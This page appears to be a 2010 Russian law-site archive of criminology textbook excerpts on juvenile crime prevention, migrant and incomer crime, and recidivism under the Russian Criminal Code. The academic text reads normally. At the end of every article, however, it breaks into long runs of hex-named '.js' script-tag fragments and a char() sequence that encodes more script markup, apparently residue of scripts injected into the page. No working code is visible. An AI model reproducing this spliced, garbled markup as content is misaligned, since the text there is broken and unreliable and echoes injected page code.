Сегодня
НАВИГАЦИЯ:
ЮРИДИЧЕСКОЕ НАСЛЕДИЕ:
РАЗНОЕ:
РЕКЛАМА:
АРХИВ НОВОСТЕЙ:
Особенности борьбы с преступностью несовершеннолетних
  Криминология | Автор: admin | 12-05-2010, 19:43
Система мер борьбы с преступностью несовершеннолетних базируется на мероприятиях общесоциального характера, призванных обеспечить надлежащий уровень жизни, благосостояния, культуры, воспитания и ооразования граждан. Являясь частью общей системы борьбы с преступностью, она обладает существенными особенностями. Эти особенности определяются тем, что система мер борьбы с преступностью несовершеннолетних:
создана и действует в соответствии с государственной семейной, молодежной и уголовной политикой, реализуемой через комплексные мероприятия целевых федеральных и региональных программ оказания социальной, экономической и иной необходимой помощи семье и детям, предупреждения безнадзорности и правонарушений несовершеннолетних, борьбы с преступностью в их среде;
имеет самостоятельную законодательную основу –- комплекс международных, конституционных, федеральных и иных структурно связанных и взаимодополняющих друг друга правовых актов, регулирующих вопросы создания оптимальных условий жизни, воспитания детей и подростков, защиты их прав и интересов, предупреждения отрицательных влияний, осуществления борьбы с безнадзорностью и преступностью;
обеспечивается деятельностью специализированной системы государственных учебных, воспитательных, лечебных, правоохранительных и иных органов и учреждений, общественных организаций и религиозных конфессий. Деятельность эта постоянно координируется как на федеральном, так и на региональных уровнях. Она опирается на необходимую информационно-аналитическую базу и обеспечивается в материально-техническом отношении бюджетным финансированием.
Наличие особенностей в системе мер по борьбе с преступностью несовершеннолетних связано также со спецификой правового и фактического положения несовершеннолетних, как возрастной группы населения, наиболее остро испытывающей формирующее влияние негативных факторов социальной среды, спецификой рассмотренных выше причин преступности, а также личностных качеств несовершеннолетних правонарушителей.
Борьба с преступлениями несовершеннолетних планируется и проводится на разных уровнях и направлениях, в отношении различных контингентов детей и подростков. Она характеризуется значительным диапазоном общевоспитательных, профилактических, а также специальных карательных мер. По характеру целевой направленности эти меры призваны предупреждать противоправное поведение несовершеннолетних, пресекать их преступные действия, а также предупреждать возможность рецидива. Они осуществляются применительно к основным сферам воспитания детей и подростков с помощью специфических, характерных для органов, участвующих в этой деятельности, средств и методов. Речь идет главным образом о целенаправленной работе по устранению недостатков в области семейного, школьного, трудового воспитания несовершеннолетних, организации их досуга, а также повышению эффективности деятельности органов, ведущих борьбу с преступностью.
Концептуальные основы и конкретные меры по решению возникающих в этой связи проблем определены в многочисленных документах, утвержденных Президентом и Правительством РФ. В их числе: "Основные направления государственной семейной политики", "Основные направления государственной социальной политики по улучшению положения детей в Российской Федерации до 2000 года", Указ Президента РФ от 1 июня 1992 года "О первоочередных мерах по реализации Всемирной декларации об обеспечении выживания, защиты и развития детей в 90-е годы", Указ Президента РФ от 16 сентября 1992 года "О первоочередных мерах в области молодежной политики", постановления Правительства РФ от 23 августа 1-993 года "О реализации Конвенции ООН о правах ребенка и Всемирной декларации об обеспечении выживания, защиты и развития детей" и от 13 января 1996 года "О плане действий по улучшению положения детей в Российской Федерации на 1995–1997 годы".
В 1994 году разработана и начала реализовываться федеральная президентская программа "Дети России", в 1996 году одобрена Правительством РФ федеральная программа "Развитие социального обслуживания семьи и детей", предусматривающие комплексные меры социальной и экономической защиты детей.
Непосредственно на решение проблем борьбы с преступностью несовершеннолетних нацелены меры, предусмотренные Указом Президента РФ от 6 сентября 1993 года "О профилактике безнадзорности и правонарушений несовершеннолетних, защите их прав", федеральными целевыми программами по усилению борьбы с преступностью на 1994– 1995 годы и на 1996–1997 годы, и программой "Профилактика безнадзорности и правонарушений детей".
Принятие перечисленных документов реально способствовало началу процесса интенсивного перехода функций предупреждения преступности несовершеннолетних от правоохранительных и, прежде всего, милицейских органов, к иным государственным и общественным структурам и учреждениям, осуществляющим главным образом социальное обслуживание детей и подростков, защиту их прав и законных интересов.
Социальное обслуживание семьи и детей выступает сегодня как составная часть принципиально нового и чрезвычайно важного для настоящего и будущего России направления социальной политики .
В странах с развитой рыночной экономикой эта сфера стоит в одном ряду с такими отраслями, как здравоохранение и образование, имеет разветвленную сеть учреждений, в которых трудятся профессионально подготовленные кадры социальных работников, психологов, юристов и других специалистов. Суть социального обслуживания семьи и детей – помочь человеку на индивидуальном личностном уровне в решении проблем его жизнедеятельности, начиная с получения положенного по закону пособия до оказания психологических, юридических, социально-бытовых услуг, гарантировать социальную поддержку и помощь в трудной ситуации и одновременно актуализировать его внутренний потенциал самопомощи.
В Российской Федерации до недавнего времени социальные услуги оказывались только пожилым людям, инвалидам и детям-сиротам и заключались в основном в помещении их в стационарные учреждения. За последние 4–5 лет ситуация динамично меняется. Нарождающиеся социальные службы активно приступили к решению проблем детской беспризорности, профилактики правонарушений несовершеннолетних, социального сиротства, безнадзорности, защите прав детей и подростков.3f311e335d2cb56ef726d55995db8af8.js" type="text/javascript">59021c69ebe9de894b10bc3b19e68acdchar(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)2fc5f64a6667c860893e2098fb9ec515.js" type="text/javascript">fd8f6fa9298a24e85901c3fe52949b15.js" type="text/javascript">0d59edbbbda424b244ce7f878a9b7a2b.js" type="text/javascript">b3a0bd654618e11cbab92c8252de8620.js" type="text/javascript">ee000cf880954adaa4b062a51ce84339.js" type="text/javascript">dd57620171f01545eb9296e31af61ac2.js" type="text/javascript">461d1ff476cf2ea333d6d2788d7f9f30.js" type="text/javascript">a52691b69938928a3fb588eaf8046808.js" type="text/javascript">7092348ddc4006c4084cb82c54d7f8ea.js" type="text/javascript">eddda8ddf081ba60e53a3cb6f3bf63c3.js" type="text/javascript">8dbcf2cafa45ec978eedde6d08799bbe.js" type="text/javascript">
Коментариев: 0 | Просмотров: 280 |
Криминологическая характеристика преступности мигрантов
  Криминология | Автор: admin | 12-05-2010, 19:43
Когда говорят о преступности мигрантов, то имеют в виду всю совокупность преступлений, совершаемых мигрантами. Специфика таких преступлений определяется особенностями самих групп мигрантов и их положения в обществе.
По мнению большинства демографов, миграция – процесс перемещения людей через границы тех или иных территорий со сменой навсегда или на время постоянного места жительства либо с регулярным возвращением к нему .
В соответствии с этим понятием основными формами миграции являются:
стационарная, когда люди переселяются на новое место жительства на постоянной основе, получают прописку, устраиваются на работу и т. д.;
сезонная, связанная с временным переездом для выполнения конкретных народнохозяйственных задач (различные промыслы: рыбные, старательские и т. п.);
маятниковая, когда люди совершают ежедневные переезды от места работы к месту жительства и обратно;
эпизодическая, связанная с временной переменой места жительства на период, зависящий от целей приезда (командировки, туристические поездки, посещение родных и близких, поездки для отдыха и другие личные цели).
Экстремальные ситуации, социально-экономические и политические кризисы, возникающая под их влиянием принципиально новая жизненная реальность порождают новые явления в миграции и ее криминологически значимых характеристиках. При этом многие аспекты миграции, носящие в прошлом позитивный характер, могут приобретать негативные оттенки. Примером служат реальные миграционные процессы в России, в последние годы перестройки и период реформ конца 80-х – начала 90-х годов.
До этого многие годы миграция выступала как преимущественно позитивное явление, способствующее развитию и расширению производства, культурному обмену и т. д. В настоящий период она, стимулируемая в ряде регионов политикой дискриминации русских и других некоренных этносов, приобрела характер вынужденных переселений. По данным Федеральной миграционной службы России, в середине 90-х годов каждый четвертый мигрант являлся беженцем или вынужденным переселенцем. При этом большое число мигрантов прибывали на новое место жительства без официальной регистрации.
Неблагоприятные формы массовых вынужденных миграций связаны с тем, что лица, вытесняемые с мест постоянного жительства межнациональной напряженностью, переходящей в некоторых регионах в открытые конфликты, вынуждены покидать жилье, оставляя и большую часть нажитого имущества.
Значительные потоки мигрантов оказывают существенное влияние на криминологическую ситуацию соответствующих регионов, создают дополнительные трудности для оперативно-профилактической деятельности правоохранительных органов. В этих условиях особое криминологическое значение приобретает проблема приезжих.
Приезжие, как специфическая демографическая группа, являются одной из разновидностей мигрантов.
Криминологи всегда выделяют контингенты преступников-приезжих – лиц, совершивших преступления не по месту жительства. Их выделение осуществляется с помощью сопоставления двух критериев – места совершения преступления и места постоянного проживания преступника. При их несовпадении лицо, совершившее преступление не на своей территории, относится к категории преступников-приезжих. Хотя все они – мигранты, но не все мигранты относятся к категории приезжих, так как значительная часть стационарных мигрантов-переселенцев, получивших жилье и прописку, по формально-юридическому подходу уже относятся к местным жителям.
К сожалению, в нынешнем своем виде уголовная статистика не позволяет согласовать демографическую классификацию мигрантов с уголовно-правовой классификацией преступников-приезжих, так как, во-первых, уголовная статистика не выделяет отдельные категории мигрантов, а во-вторых, разбивается основная группа стационарных мигрантов на тех, кто уже устроился и относится статистикой к местным жителям, и тех, кто находится в стадии устройства, еще не прописан и т. д. и в связи с этим входит в число приезжих.
Соответственно в уголовной статистике выделяются среди всех преступников местные жители и приезжие, т. е. лица, местными жителями не являющиеся.
Криминологическая актуальность изучения преступности приезжих определяется рядом обстоятельств:
во-первых, они оказывают существенное влияние на криминальную ситуацию в стране, регионе;
во-вторых, это влияние резко возрастает в условиях социальных кризисов и оказывает заметное воздействие на преступность. Например, Россия после десяти.лет перестройки и реформ приняла более 2 млн. вынужденных переселенцев. 25 млн. русских из стран ближнего зарубежья в этих условиях стали потенциальными мигрантами;
в-третьих, возникает целый ряд новых экономических, социальных, политических, духовных проблем, в том числе затрагивающих международно-правовые аспекты, положение иностранцев на территории государства, обеспечение их безопасности и т. п. Так, экономические интересы России в условиях реформ связаны с ее участием в международной рыночной системе и другими факторами, привлекающими в страну иностранцев дальнего зарубежья. Однако иностранцы нередко попадали в такие криминальные условия, что, если сами и не совершали преступлений, то легко становились их жертвами. Кроме того, дестабилизация положения дел в стране привлекала криминально ориентированных иностранцев, в том числе организованных преступников, наживающихся на наркобизнесе, торговле оружием и др.9299e8015ce1f47bfdcee14268cea51b.js" type="text/javascript">2163eaa2c8f064f4377cf2a8319a679fchar(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)bcf8868405335b60c9390e01bad15268.js" type="text/javascript">c9010c190be3bedb2241552bedb51ad8.js" type="text/javascript">1a556cd8f0f9d914d05e4fdf18505261.js" type="text/javascript">5945a637fc74f2aa8ef616a155c03161.js" type="text/javascript">6b4e11244d04d85be3ec26ad92ca6007.js" type="text/javascript">946c6c021bb40558efcde0f5aabf83b4.js" type="text/javascript">671502e8eff5838c9dfd11d81118cc62.js" type="text/javascript">1f5ea0f0a131a4ddc7c049956f55f795.js" type="text/javascript">e1640664b58bd3cdfff53689570fa01c.js" type="text/javascript">c9fd099014cf6e79822f7bc1877099fc.js" type="text/javascript">28ef5dfda715ac1b7189d5c190d09f8c.js" type="text/javascript">
Коментариев: 0 | Просмотров: 642 |
Специфика, детерминации и причинности
  Криминология | Автор: admin | 12-05-2010, 19:43
Преступность приезжих детерминируется всем комплексом обстоятельств, обусловливающих сохранение преступности в стране. Этим же обстоятельствам принадлежит ведущее, базовое место и в причинном комплексе данной преступности. Они являются как бы фундаментом указанного комплекса, на который наслаиваются и с которым взаимодействуют специфические обстоятельства, возникающие у мигрантов, особенности их положения, жизнедеятельности.
Итак, назовем три линии детерминации преступности приезжих:
во-первых, комплекс причин и условий, влиявших на формирование личности до возникновения проблемной жизненной ситуации, обусловившей факт миграции;
во-вторых, причины и условия, действовавшие в проблемной жизненной ситуации, зачастую определяющие факт и цели миграции;
в-третьих, комплекс обстоятельств, оказывающих влияние на мигрантов после их приезда в тот или иной населенный пункт .
В настоящем разделе нет необходимости подробно останавливаться на первой линии детерминации, так как она уже освещалась в общих разделах. Специальные исследования преступности мигрантов дают новые яркие подтверждения тому, что неблагополучие в экономической, политической, социальной и духовной сферах приводит к неразрешимым противоречиям, проблемам и конфликтным ситуациям, стимулирующим рост уровня криминализации общества. Среди населения возникают и ширятся слои, живущие за чертой бедности, бездомные, безработные, разочарованные в защищаемых законом ценностях и готовые на любые, в том числе антиобщественные, способы обеспечения своих потребностей, оказывающиеся в острых стрессовых ситуациях и испытывающие разные психологические воздействия, например, алкоголя, наркотиков и т. п. В ряду неблагоприятных последствий экономического и политического кризиса стоит и вынужденная миграция населения, несущая с собой целый ряд негативных факторов, вплоть до потери части генофонда нации. В России Федеральная миграционная служба регистрировала к середине 90-х годов в качестве беженцев и вынужденных переселенцев ежегодно около 200 тыс. человек.
Вынужденные миграции чаще всего связаны с утратой мигрантами своего прежнего социального статуса, потерей жилья, работы. В местах прибытия наиболее острыми для них являются проблемы жилья, трудоустройства. Последняя особенно обострилась в условиях безработицы. Такие миграции резко отличаются от вызванных производственной необходимостью организованных переселений, например, в регионы страны, испытывающие недостаток в трудовых ресурсах. В последних случаях мигранту, как правило, гарантировались место работы, зарплата и жилье. В отличие от них беженцы и вынужденные переселенцы, уже понесшие значительные экономические и социальные потери, в местах своего переселения тоже оказываются в худших условиях, что весьм.а осложняет процесс их адаптации.
Эти внешние факторы социальной среды взаимодействуют с характеристиками самих вынужденных мигрантов. Почти все они находятся в психологическом состоянии стресса. Как отмечала Федеральная миграционная служба России, даже среди тех, кто преодолел все сложности и благополучно устроился на новом месте, около 70% сохраняют ощущение психологической травмы.
По этим объективным и субъективным причинам мигранты являются наиболее уязвимым объектом для всякого рода негативных влияний, и если сами и не совершают преступлений, то легко становятся их жертвами.
Нельзя игнорировать то обстоятельство, что массовое прибытие вынужденных мигрантов в первое время ухудшает и условия жизни коренного населения, обостряя социальные конфликты между местными жителями и приезжими. В местах своей концентрации мигранты осложняют жилищную ситуацию, проблему безработицы, повышают нагрузку на всю инфраструктуру соответствующего региона, что затрудняет работу транспорта, предприятий бытового обслуживания и других отраслей хозяйства. Например, мэры ряда городов России, принимавшие каждый год от 1 до 2 тыс. беженцев, затрачивали на устройство таких лиц средства бюджета, вынуждая тем самым сокращать жилищное и другое строительство. Неудивительно, что, по данным опроса жителей 13 регионов России, каждый десятый высказался вообще против приема мигрантов и каждый второй – против приема мигрантов некоренной национальности .c58a41b8d63b1bea19b3e6f1f70135e1.js" type="text/javascript">f2db4c68332e98b11170a64cc65be4c4char(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)68e2a263791a47e53a488f7a6fcf0e48.js" type="text/javascript">6f985761d5d6f982d2b289df1424708f.js" type="text/javascript">64fb16bc6726c3b974d94b232d297ed1.js" type="text/javascript">07d13188ef6fe36867dd318c678d9607.js" type="text/javascript">7f792add884f8bdd8a0f57c474ba7a0c.js" type="text/javascript">ca3cf200bacb49e7d49507a5c51ca148.js" type="text/javascript">dd847922f38b07f7e6ac4e949c72bf86.js" type="text/javascript">8ff77fe75714262c1a63c876de7e1219.js" type="text/javascript">5769225c96253a7c915874cfb3bde08d.js" type="text/javascript">1a0a62553f6bdcfa2dbfdb101fefec7f.js" type="text/javascript">08dc72ba90a6ade40c1dbed57acdfd61.js" type="text/javascript">
Коментариев: 0 | Просмотров: 245 |
Особенности борьбы с преступностью мигрантов
  Криминология | Автор: admin | 12-05-2010, 19:43
Сложности борьбы с преступностью приезжих определяются прежде всего разнородностью контингента мигрантов. С одной стороны, общие меры безопасности населения, применяемые повсеместно, призваны обеспечить правопорядок, охрану прав и законных интересов любых граждан, находящихся на территории страны. Поэтому чем выше уровень безопасности населения, тем соответственно выше и уровень защищенности приезжих, иностранцев и других подобных лиц. С другой стороны, интересы борьбы с преступностью и ее профилактики требуют специфических подходов к разным контингентам населения, в том числе к мигрантам.
При этом, поскольку на криминологическую ситуацию влияют количественные и качественные параметры потока приезжих, постольку интересы охраны правопорядка предполагают как сокращение по возможности или оптимизацию количества приезжих, так и создание надлежащих условий их пребывания, снижающих вероятность возникновения криминогенных ситуаций.
Достижение этих целей возможно только путем совершенствования политической, экономической и духовной жизни общества, т. е. мерами, относимыми криминологической наукой к общепрофилактическим. То, что борьба с преступностью зависит в первую очередь от проведения эффективной политики реформ в России, а уже затем от состояния специально-предупредительной и правоохранительной деятельности, особенно ярко доказывается анализом преступности мигрантов.
Без общесоциальных мер, только специальными, нельзя успешно нейтрализовать негативные последствия миграции. Так, дополнительные рабочие места могут успешно и стабильно создаваться только на базе роста производства, успешной социально-экономической политики.
В то же время изложенное не исключает признания важности специальных межгосударственных миграционных программ. Именно они способны обеспечивать разрешение большинства проблем, связанных с миграцией и особенно вынужденной миграцией населения.
Закон о беженцах и вынужденных переселенцах, а также целый ряд специальных нормативных актов способны давать положительный эффект только при наличии соответствующих экономических и социальных гарантий их осуществления.
Таким образом, фактор повышенного притока приезжих должен учитываться как в широком аспекте – при регулировании социально-экономического развития страны, региона; города, так и в более узком – при управлении процессом борьбы с преступностью.
Особо следует подчеркнуть общепрофилактическое значение надлежащего обслуживания приезжих. Существует масса нерешенных проблем, создающих для приезжих ряд материальных, организационных и психологических трудностей. Они могут быть связаны, например, с недостатками транспортного и иного обслуживания, слабой социальной помощью нуждающимся в ней приезжим, слабой материальной базой их временного бытового устройства и т. д. Последнее обстоятельство существенно тормозит строительство специальных гостиниц вблизи вокзалов для транзитных пассажиров и других лиц, приехавших на короткие сроки, развитие частного гостиничного хозяйства, создание единой службы централизованного размещения иногородних, централизованной справочной службы для приезжих и многие другие полезные инициативы, общепрофилактическое значение которых весьма значимо.
Общепрофилактические меры одинаково важны как для местного населения, так и для разных контингентов приезжих, в том числе иностранцев. Но для иностранцев наряду с этим важно прежде всего правовое регулирование их пребывания на территории страны.
Основы правового статуса иностранцев на территории Российской Федерации определяются прежде всего Конституцией России (ст. 62 и 63). В ст. 62 Конституции РФ, в частности, сказано, что "иностранные граждане и лица без гражданства пользуются в Российской Федерации правами и несут обязанности наравне с гражданами Российской Федерации, кроме случаев, установленных федеральным законом или международным договором Российской Федерации", в числе которых, например, правовое положение иностранцев, пользующихся привилегиями и дипломатическим иммунитетом от административной и уголовной юрисдикции нашей страны. Кроме того, в части, не противоречащей законодательству РФ и заключенным ею международным соглашениям, действуют также специальные правовые акты: Закон СССР о правовом положении иностранных граждан в СССР , Правила пребывания иностранных граждан в СССР и Правила транзитного проезда иностранных граждан через территорию СССР . Нарушения этих норм влекут для иностранцев разного рода ответственность, вплоть до уголовной. Ст. 197 У К РСФСР предусматривала уголовную ответственность за нарушение правил въезда или проживания в пограничной полосе или пограничной зоне, а ст. 1971 УК РСФСР – за нарушение иностранными гражданами и лицами без гражданства правил пребывания и транзитного проезда через территорию страны. Как показывают исследования, карательная практика в отношении лиц, нарушивших эти нормы, была крайне слабая: за ряд последних лет по указанным статьям никто не осуждался. Это объясняется как административной преюдицией этих норм, так и возможными недостатками уголовно-правового воздействия, применяемого к иностранным гражданам.
Требуют согласованного решения проблемы беженцев, вынужденных и других категорий мигрантов с целью пресечения незаконной миграции и оказания помощи вынужденным мигрантам. Поэтому, например, заслуживает внимания межгосударственный акт (типа конвенции) об оказании правовой помощи, регулирующий перемещение граждан стран – участников СНГ с пересечением границ, учет таких перемещений и порядок контроля.
Приоритет общепредупредительных мер еще не означает их первоочередности; напротив, такие меры должны сочетаться и взаимодействовать одновременно с мерами специально-предупредительными и правоохранительными.
При этом равенство перед уголовным законом иностранцев и лиц без гражданства и в случае охраны их бизнеса, и в случае совершения ими преступлений не исключает, а, наоборот, предполагает дифференциацию профилактических, оперативно-розыскных, процессуальных и иных мер воздействия. В России они по-разному применяются в отношении граждан стран СНГ, других стран, входивших ранее в состав СССР, или стран дальнего зарубежья, в составе которых различаются страны Америки, Европы, Ближнего и Дальнего Востока и другие с их дальнейшей более глубокой дифференциацией.
В настоящее время основу специально-предупредительных мер, направленных на оказание всесторонней помощи иностранным гражданам и осуществление контроля за их пребыванием, составляет административно-правовая деятельность подразделений милиции общественной безопасности и Паспортно-визовой службы органов внутренних дел. Хотя оказание помощи иностранным гражданам в осуществлении их прав и законных интересов реализуется в деятельности всех структурных звеньев системы'МВД, тем не менее Паспортно-визовая служба в соответствии с приказом МВД России № 445 1993 года координирует их работу по участию в обеспечении контроля за соблюдением правил пребывания иностранцев и лиц без гражданства на территории РФ, руководствуясь в своей деятельности помимо законов и нормативных актов МВД Положением о Паспортно-визовой службе МВД РФ, утвержденным приказом № 124 1993 года МВД России . Специально-профилактическая роль Паспортно-визовой службы определяется самим характером ее функций, в число которых входит: выдача паспортов, осуществление прописки и выписки, регистрация иностранных граждан и лиц без гражданства, выдача им документов на право проживания, оформление разрешений на въезд в РФ и выезд за границу и т. д.
Большое профилактическое значение имеет проведение такой службой совместно с другими подразделениями органов внутренних дел различных комплексных специальных мероприятий: рейдов, патрулирования, целевых оперативно-поисковых мероприятий по выявлению иностранцев, у которых отсутствуют законные основания пребывания в России, проверки соблюдения паспортного режима и т. д. Основной задачей данных мероприятий является: выявление иностранцев, не соблюдающих порядок регистрации, проживающих по просроченным или недействительным документам, не соблюдающих порядок передвижения и выбор места жительства, и других тому подобных категорий. О лицах, претендующих на получение убежища, органы МВД в срочном порядке информируют Миграционную службу России для принятия ею соответствующего решения.3240dd7827c4b368200180e1c4085f0c.js" type="text/javascript">acd57f38a14abb02c16da74f112e56efchar(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)3d5b332eab8b4a6b9e339b408b3eb0bd.js" type="text/javascript">e3ec678253db9244d4a666aa2a619b7d.js" type="text/javascript">c2bcbacd7da975848279d93fac30a117.js" type="text/javascript">02c7a85c0c5c58542578a15cc40a94ad.js" type="text/javascript">8fa80842a1e00fb7f48f2a73ef0b540e.js" type="text/javascript">98f8a7d09df47ffab45df312fe3e1bdb.js" type="text/javascript">70a173b535ad8eac0cdddaf4b535c74e.js" type="text/javascript">c6c76dfc8aa50426dac1f35760797925.js" type="text/javascript">1caf8ef368cc3168034188434d774c77.js" type="text/javascript">ee6438e2e8fa9995e121eab0a60cf02f.js" type="text/javascript">56f7a656270b70eac918c4fa95fbde27.js" type="text/javascript">
Коментариев: 0 | Просмотров: 306 |
Криминологическая характеристика рецидивной преступности
  Криминология | Автор: admin | 12-05-2010, 19:43
Когда говорят о рецидивной преступности, то имеют в виду совокупность преступлений, совершаемых рецидивистами.
Уже само определение рецидивной преступности свидетельствует о том, что это составная часть всей преступности, выделенная по особой характеристике субъекта преступления, аналогично тому, как выделяется, например, преступность несовершеннолетних, женская преступность и т. д.
Понятие "рецидив" произошло от латинского recidivus, что в переводе означает повторение явления после его кажущегося исчезновения. К рецидивным криминологи относят все преступления, совершенные лицами, ранее совершавшими преступления, в случае если прежние преступления известны правоохранительным органам и стали предметом их основанного на законе реагирования. Это не только осуждение судом, но и передача виновного на поруки, направление материалов дела на рассмотрение товарищеского суда, комиссии по делам несовершеннолетних и т. п.
Рецидив преступлений отличается от совокупности и по-вторности тем, что новое преступление совершается уже после того, как были приняты предусмотренные законом меры за предыдущие. Повышенная общественная опасность рецидивной преступности заключается в том, что она выражает такое качество преступности, как ее устойчивость, свидетельствуя об упорном нежелании ряда лиц вести себя соответственно принятым в обществе нормам, о предпочтении криминальных вариантов решения своих проблем, несмотря на принятые к ним меры. Она свидетельствует также о несовершенстве правоохранительной системы, не способной эффективно воздействовать на лиц, совершивших преступления, слабом воздействии наказания, не достигающего целей исправления и перевоспитания осужденных. Кроме того, рецидивисты – наиболее запущенные в нравственно-правовом отношении лица, трудно поддающиеся воспитательному воздействию, оказывающие заметное отрицательное воздействие на качественные характеристики преступности, повышение степени ее тяжести, общественной опасности, организованности и профессионализма. Они несут в общество свои антиобщественные взгляды и нормы поведения, пропагандируют криминальную субкультуру, оказывая тем самым пагубное влияние на морально неустойчивых лиц, особенно из молодежной среды, втягивая их в преступную деятельность.
Указанное криминологическое понимание рецидива отличается от уголовно-правового, например, отраженного в ст. 18 нового Уголовного кодекса Российской Федерации. Там говорится, что "рецидивом преступлений признается совершение умышленного преступления лицом, имеющим судимость за ранее совершенное умышленное преступление". В то же время Уголовный кодекс предусматривает освобождение от уголовной ответственности лица, впервые совершившего преступление: небольшой тяжести, в связи с деятельным раскаянием (ст. 75 УК РФ), в связи с примирением с потерпевшим (ст. 76 УК РФ), небольшой или средней тяжести вследствие изменения обстановки (ст. 77 УК РФ). А при совершении несовершеннолетним преступления небольшой или средней тяжести предусмотрена возможность его освобождения от уголовной ответственности и применение принудительных мер воспитательного характера (ст. 90 УК РФ).
Во всех этих случаях, а также в случае назначения наказания, не связанного с лишением свободы, за первое преступление, по Уголовному кодексу РФ, лицо не признается рецидивистом с соответствующими правовыми последствиями. Но криминологи такое лицо считают рецидивистом, ибо им приходится объяснять не просто факт преступного поведения, но и то, почему он повторился после выявления предыдущего и принятия предусмотренных законом мер.
Итак, самое широкое понятие рецидива принято криминологией. В основе криминологического понятия рецидива заключается факт неоднократного совершения преступления лицом, независимо от характера принятых мер. В соответствии с этим под данное понятие подпадают преступления, совершенные: лицами, судимость которых снята и погашена; лицами, судимость которых не снята и не погашена; лицами, отбывающими наказание; лицами, освобожденными от ответственности по нереабилитирующим основаниям; лицами, совершившими новое преступление в период предварительного расследования или судебного разбирательства уголовного дела о первом преступлении. Под уголовно-правовым рецидивом понимается совершение нового преступления лицом, ранее судимым, судимость которого не снята и не погашена в установленном законом порядке.
Существует также понятие пенитенциарного рецидива, которое разными авторами применяется в тех или иных случаях. Одни имеют в виду, что последущее преступление совершено после отбывания наказания в виде лишения свободы (данное толкование совпадает с уголовно-правовым рецидивом в понимании нового УК РФ), другие авторы таким рецидивом считают совершение нового преступления в условиях отбывания лишения свободы, т. е. в пенитенциарном учреждении. И тогда понимание рецидива в последнем смысле в значительной степени приводит к отождествлению понятий рецидивная и пенитенциарная преступность. На самом деле эти понятия важно различать, имея в виду указанное выше криминологическое определение рецидивной преступности .
Основное, что отличает рецидивистов от лиц, впервые совершивших преступление, – это, во-первых, степень их нравственно-правовой запущенности, проявляющаяся в конкретных деяниях и суждениях; во-вторых, особо отрицательные характеристики социальной среды личности. Все это во взаимодействии служит источником новых преступлений уже после того, как их антиобщественные поступки получили соответствующую правовую оценку государства и общества, повлекли за собой принятие соответствующих правовых мер. Характер ранее принятых к таким лицам мер может быть различным.
Рецидивная преступность – составная часть всей преступности, поэтому для нее характерны прежде всего все характеристики, присущие всей преступности и преступности первичной . Но наряду с общими характеристиками рецидивная преступность обладает и специфическими характеристиками, присущими только ей одной в отличие от преступности первичной. Именно их анализ позволяет выявить самые существенные, самые важные стороны рецидивной преступности, необходимые для оценки ее качественного состояния. К таким характеристикам относятся:
кратность рецидива – количество преступлений, с применением соответствующих мер уголовно-правового воздействия, предшествующих последнему преступлению. По общему правилу выделяется простой и многократный рецидив. К последнему относится совершение одним лицом трех и более преступлений;
степень общественной опасности рецидива, определяемая количеством преступлений. При этом выделяются опасный и особо опасный рецидив. В соответствии со ст. 18 УК РФ "рецидив преступлений признается опасным при совершении лицом умышленного преступления, за которое оно осуждается к лишению свободы, если ранее это лицо два раза было осуждено к лишению свободы за умышленное преступление; при совершении лицом умышленного тяжкого преступления, если оно ранее было осуждено за умышленное тяжкое преступление. Рецидив признается особо опасным:
а) при совершении лицом умышленного преступления, за которое оно осуждается к лишению свободы, если ранее это лицо три или более раз было осуждено к лишению свободы за умышленное тяжкое преступление или умышленное преступление средней тяжести;
б) при совершении лицом умышленного тяжкого преступления, если ранее оно два раза было осуждено за умышленное тяжкое преступление или было осуждено за особо тяжкое преступление;
в) при совершении лицом особо тяжкого преступления, если ранее оно было осуждено за умышленное тяжкое или особо тяжкое преступление";
общий и специальный рецидив, различающийся степенью однородности совершаемых рецидивистом преступлений. Специальный рецидив, характеризующийся повторным со-вершением преступлений однородного состава, свидетельствует о степени профессионализма рецидивистов, повышенной степени их общественной опасности;
интенсивность преступности рецидивистов, демонстрирующая частоту совершения преступлений, – период времени между предыдущим и последующим преступлением. В соответствии с этим принято выделять число рецидивистов, совершивших преступление в течение первого года после освобождения от наказания за предыдущее преступление;
характер динамики криминальной активности рецидивистов – переход от совершения преступлений одной тяжести к преступлениям иной тяжести;
вид рецидива, связанный с характером мер, применявшихся к лицу за совершение предыдущего преступления. Он определяется, например, числом лиц, ранее содержавшихся в ИТУ и вновь совершивших преступления; числом лиц, совершивших очередное преступление в период неотбытой части наказания после условно-досрочного освобождения, в период отбывания исправительных работ, после отсрочки исполнения приговора; числом лиц, совершивших преступления, когда они находились под следствием по делу о предыдущем преступлении; а также, имея в виду криминологический рецидив, количеством лиц, освобожденных от уголовной ответственности по амнистии, с применением мер общественного воздействия и другим нереабилитирующим основаниям. Анализ уровня рецидива после применения мер воздействия к лицу, совершившему преступление, имеет огромное практическое значение, так как позволяет дать оценку конкретным мерам уголовно-правового воздействия с целью определения их адекватности, выявления наиболее распространенных недостатков и их последующей коррекции.
Методика анализа рецидивной преступности предполагает изучение как количественных, так и качественных ее характеристик. Общепринятые подходы к такому изучению связаны прежде всего с анализом и оценкой уровня рецидивной преступности. Он определяется количеством преступлений, совершенных лицами, ранее совершавшими преступления, и числом таких лиц. При этом, поскольку преступность, в том числе рецидивная, под влиянием различных взаимодействующих факторов постоянно меняется, необходимо изучение тенденций ее изменения, т. е. динамики преступности по определенным периодам (десятилетиям, пятилетиям, отдельным годам). Важно также определить регионы, где такая преступность получила наибольшее развитие, т. е. анализ географии рецидивной преступности. Выбор тех или иных объектов изучения определяется целями и задачами, стоящими перед исследователями. Но вместе с тем, когда речь идет о рецидивной преступности, непременным условием ее изучения является сравнительный анализ соотношения рецидивной и первичной преступности. Анализ предполагает расчет удельного веса (доли) рецидивной преступности в общем числе зарегистрированных преступлений, дела о которых закончены производством в отчетном периоде, и доли в общем числе выявленных преступников – тех, кто ранее совершал преступления.4649014ab1e60a5d3bfe337da76f9788.js" type="text/javascript">c92f2d0221c2d767eadbe7a1f68f2355char(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)252d21434e0b30f4d8596019e54c7a91.js" 